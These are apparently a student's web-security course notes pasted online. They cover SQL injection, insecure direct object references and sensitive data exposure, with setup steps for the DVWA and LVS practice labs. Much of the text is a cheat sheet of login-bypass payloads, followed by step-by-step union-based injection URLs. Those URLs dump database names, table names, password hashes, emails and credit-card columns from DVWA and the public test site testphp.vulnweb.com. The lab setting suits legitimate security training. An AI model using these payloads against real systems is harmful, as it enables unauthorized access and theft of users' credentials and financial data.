· 6 years ago · Jan 02, 2020, 04:18 PM
1
2
3SQL Injection
4=============
5Authentication Bypass
6---------------------
7 To bypass the authentication on any login form and gain teh access as the administrator.
8 There are 4 types of authentication
9 1. Basic Authentication
10 2. Integrated Authentication
11 3. Digest Authentication
12 4. Form Based Authentication
13
14Logic Gates
15===========
16AND Gate --> If any of the value is false, then the ans will be flase
17
18 0 and 0 = 0
19 0 and 1 = 0
20 1 and 0 = 0
21 1 and 1 = 1
22
23OR --> If any of the value is true, then the answer will be true
24
25 0 or 0 = 0
26 0 or 1 = 1
27 1 or 0 = 1
28 1 or 1 = 1
29
301 ---> True ---> Administrator
31
32' ---> Single inverted Comma ---> Use to break the SQL query
33
341'or'1'='1
35select '1'or'1'='1'
36
37Username --> 1'or'1'='1 always true
38Password --> 1'or'1'='1 always true
39 Administrator Login
40 x'or'x'='x ---> true
41
42Cupons| Promo Code ---> 1'or'1'='1
43
44
45Cheat sheet
46===========
47or 1=1
48or 1=1--
49or 1=1#
50or 1=1/*
51admin' --
52admin' #
53admin'/*
54admin' or '1'='1
55admin' or '1'='1'--
56admin' or '1'='1'#
57admin' or '1'='1'/*
58admin'or 1=1 or ''='
59admin' or 1=1
60admin' or 1=1--
61admin' or 1=1#
62admin' or 1=1/*
63admin') or ('1'='1
64admin') or ('1'='1'--
65admin') or ('1'='1'#
66admin') or ('1'='1'/*
67admin') or '1'='1
68admin') or '1'='1'--
69admin') or '1'='1'#
70admin') or '1'='1'/*
711234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
72admin" --
73admin" #
74admin"/*
75admin" or "1"="1
76admin" or "1"="1"--
77admin" or "1"="1"#
78admin" or "1"="1"/*
79admin"or 1=1 or ""="
80admin" or 1=1
81admin" or 1=1--
82admin" or 1=1#
83admin" or 1=1/*
84admin") or ("1"="1
85admin") or ("1"="1"--
86admin") or ("1"="1"#
87admin") or ("1"="1"/*
88admin") or "1"="1
89admin") or "1"="1"--
90admin") or "1"="1"#
91admin") or "1"="1"/*
921234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
93
94
95http://www.snvmpgcollege.com
96
97EVS setup
98=========
99Euinac Vulnerable Simulator
100=============================
101
102DVWA --> Damm Vulnerable Web Application
103----------------------------------------
104 Open Source
105
106LVS_1.zip
1071. Copy the zip file
1082. Paste it in C:\xampp\htdocs
1093. Extract the zip file
110 LVS_1
1114. Start the xampp server
112 Apache
113 MySQL
1145. Start the browser
115 127.0.0.1/lvs_1
1166. Click on the link --> lvs111
117
118
119
120
121
122
123SESSION 10
124==========
125
126METHODS USED IN WEB APPLICATIONS
127================================
128
129
130 Get Parameter :
131
132 Post Parameter :
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
1771. GET - It is the method used by web applications which is unsecure and show all the transmitting data from the web application UI to its Database or server. Requests data from a specified resource.
178eg. php?id=1, ?cat=54, ?test=query.
179
1802. POST - The method which hides and requests the data from the Database or Server Secretly. eg. twitter.com/login.php
181
182----------------------------------------------------------
183
184INSECURE DIRECT OBJECT REFERENCE
185================================
186A direct object reference occurs when a developer exposes a reference to an internal implementation object such as a file, directory or a database key. Without an access control check or other protection, Attackers can directly access the unsecured files and configurations and settings which are neither authorized nor validated by the administrator.
187
188For eg. :
189
190CHJM Website :
191
192Accessing into another user -
193www.chjm.org/login/.../php?id=alex
194www.chjm.org/login/../php?id=logan ( entered into Logan's Account)
195
196
197Accessing into pages which are not authorized to a basic user-
198www.chjm.org/user+profile -- /../settings/config.html
199
200www.chjm.org/login/../php?id=logan/settings/config.html
201
202
203- Demo in WAVE.
204
205-------------------------------------------------------------------------------------------
206
207SENSITIVE DATA EXPOSURE
208=======================
209Many web applications do not properly protect sensitive data such as Names, IDs, Credit Cards details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or any other crimes. These Sensitive Data is well aspected to encryption also in which if the data is not encrypted and is in plain text, it will be very easier to get fetched by the attacker or any other individual.
210
211Types of Sensitive Data
212=======================
213
2141. Personal - Names, Address , Contact Numbers etc.
2152. Confidential - ID,Passwords - Credentials, Aadhar No.
2163. Financial - Bank Accounts numbers, credit cards, debit cards etc.
2174. Health Information - Policies, insurances etc.
218
219Demonstration on LVS.
220
221----------------------------------------------------------
222
223DVWA SETUP AND CONFIGURATION
224============================
225DVWA stands for Damn Vulnerable Web Application, it is PHP MySQL based Web Application which is a organisational based understanding Web Application fopr OWASP TOP 10 like LVS.
226
227STEPS
228=====
229Copy zip file into C:\xampp\htdocs
230Right click the zip file, click on extract here
231start xampp server, start apache and mysql
232Go to the directory of dvwa in “htdocs”, navigate to the folder config, open the config.php file and make password=””(empty).
233Open the browser, goto 127.0.0.1/dvwa
234It will show you a message “Click here to create the Database”.
235After Clicking, your Database have been created in “127.00.0.1/phpmyadmin” which will lists out all the Databases.
236Go through the Instruction Page of LVS and then start learning through it.
237
238----------------------------------------------------------
239
240OWASP A1. INJECTIONS
241=====================
242
243
244id=1
245
246Select * from anything where id=1;
247
248
249SQL Injection
250
251 1. Union Based
252 2. Error Based
253 3. Time Based/ Bolean Based
254
255
256
257
258
259UNION BASED SQL INJECTION
260=========================
261
262 information_schema
263
264
265
266
267
268
269
270UNION BASED SQLI is a type of attack vector in which a attacker inputs some kind of SQL Synatxes in a Input Method of a Web Application UI, And he/she can be able to communicate and access the Database.
271The attacker extracts the data through inputting some SQL Queries into the Web Application UI and henced get the “Juicy” Data from Database -> Tables -> Columns -> Rows
272
273TERMINOLOGIES
274=============
2751. Information Schema : It has all of the data regarding every databases, tables, columns and every other detail of a Database. It is considered as the mother of Informations in Database.
2762. --+ : Everything written with --+ would be acted like a SQL QUERY.
2773. # : Everything entered after # will not be considered.
2784. database() - name of the database
2795. version() - version of the database.
280
281column_name
282table_name
283
284= order by - sorts the entry way or known as entities of the database.
285= union select - it carries out more than one data in a executive manner.
286 join + extract
287= group_concat - group the data and add them.
288 concatenation = addition
289
290
291
292Target - http://127.0.0.1/dvwa/vulnerabilities/sqli/
293
294STEPS - For SQLi always recommend to use Firefox, as special symbols and spaces does not get converted into URL encode
295
296
297
298
299Union Based SQL Injection :
300
301
302
303STEPS
304======
305
306Step 1: To find the GET Method/Parameter
307 eg. php?id=1
308 ?cat=24
309 ?test=query
310Trying to click each and every possible link or will give inputs to the search boxes of GET Method.
311
312 “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1&Submit=Submit#”
313
314
315Step 2: Check if my site is Vulnerable or not to Union Based SQLI
316 ?id=1'
317 php?id=1'
318
319 ''1'''
320
321 Select * from anything where id='''1''''
322
323
324 Select * from anything where id =2
325
326 Select * from anything where id =1'
327
328
329 Select * from anything where id=1 order by 10
330
331
332Unknown column '10' in 'order clause'
333
334
335
336
337If we get an error that means my website is vulnerable to Union Based SQLI.
338
339It will give - “http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' &Submit=Submit#
340You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 “
341
342
343Step 3: To check the number of columns present in the database
344 order by 100--+
345 order by 200--+
346 order by 300--+
347 Until we get an error of “Unknown Order Clause”.
348
349Eg. 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
350 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
351 127.0.0.1/dv18/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
352Unknown column '3' in 'order clause'
353
354There is two columns which exists in databases.
355
356http://localhost/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,%20table_name%20from%20Information_schema.tables--+&Submit=Submit#
357
358localhost/dvwa/vulnerabilities/sqli/?id=1' union select 1, column_name from Information_schema.columns --+&Submit=Submit#
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386Step 4: To Union Select the columns which are present in the Database and is Vulnerable
387 union select 1,2--+
388
389http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select 1,2--+ &Submit=Submit#
390
391
392Step 5: Extracting Information from Database
393 - database()
394 - version()
395 - union select version(),2--+
396 - union select 1,version()--+
397
398 - union select all 1,version()--+ : 10.1.25-MariaDB
399 - union select all 1,database()--+ : dvwa
400
401Step 6: Calling the Mother of Database - information_schema
402
403= Extracting Table Names
404 - union select all 1,table_names from information_schema.tables--+
405
406
407
408
409
410
411
412http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' union select all 1,table_name from information_schema.tables--+&Submit=Submit#
413
414= After Selecting a Juicy Table, Extracting data of that table :
415 - column_name, information_schema.columns
416
417 - union select all 1, columns_name from information_schema.columns where table_name="users"--+
418
419= To get the data from columns (user, password)
420
421 - union select user,password from users--+
422 - http://127.0.0.1/dv18/vulnerabilities/sqli/?id=1' group_concat(user,0x0a,password),2 from users--+
423
424And we will get the Juicy Data.
425
426-------------------------------------------------------------------------------
427
428TESTING WEBSITES
429================
4301. http://demo.testfire.net/
4312. http://testphp.vulnweb.com/
432
433
434TASKS
435=====
4361. What is the Meaning of % in URL?
4372. What is WAF?
438
439-------------------------------------------------------------------------------
440
441
442
443http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(uname),3 from users
444
445group_concat(user,0x0a,password),from users
446
447
448
449
450 http://testphp.vulnweb.com/artists.php
451 http://testphp.vulnweb.com/artists.php?artist=1
452 http://testphp.vulnweb.com/artists.php?artist=1
453 http://testphp.vulnweb.com/artists.php?artist=1 order by 1
454 http://testphp.vulnweb.com/artists.php?artist=1 order by 3
455 http://testphp.vulnweb.com/artists.php?artist=-1 unionselect1,version(),current_user()
456 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database()
457 http://testphp.vulnweb.com/artists.php?artist=-1 unionselect1, group_concat(table_name),3 from information_schema.tables where table_schema= database()
458 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(pass),3 from users
459 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(email),3 from users
460 http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(cc),3 from users
461 http://testphp.vulnweb.com/artists.php?artist=-1 artist=-1 union select 1,pass,cc from users where uname="test"
462
463
464 columns_name from information_schema.columns where table_name="users"
465
466
467
468group_concat(table_name) from information_schema.tables where table_schema= database()
469
470group_cocat()
471
472
473
474
475
476
477 1
478 1'
479 order by 1
480 order by 2
481 union select 1,2 --+
482 union select 1,database()--+
483 id=1'union select 1,table_name from information_schema.tables--+
484 id=1'union select 1,column_name from information_schema.columns--+
485 union select 1,group_concat(pass),3 from users